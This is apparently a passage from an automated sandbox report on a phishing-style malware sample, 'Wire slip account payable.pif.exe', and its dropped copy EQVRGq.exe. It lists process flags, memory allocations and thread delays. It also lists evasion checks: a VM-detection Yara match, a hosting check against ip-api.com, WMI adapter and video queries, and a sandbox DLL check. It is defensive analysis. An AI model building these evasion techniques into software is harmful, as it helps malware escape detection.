Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EQVRGq.exe PID: 7560, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 1550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 2D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 4D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 7D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 8D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 8F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 9F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 1190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Memory allocated: 4BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 71D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 81D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 8360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 9360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 2E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 3060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Memory allocated: 2F80000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598545	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598426	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596951	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596187	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 596078	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594963	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597671
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597220
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596189
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595847
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595176
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Thread delayed: delay time: 594390

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8937	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 462	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9264	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Window / User API: threadDelayed 3184	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Window / User API: threadDelayed 6670	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Window / User API: threadDelayed 1455
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Window / User API: threadDelayed 8390

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe TID: 2688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 8937 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep count: 462 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
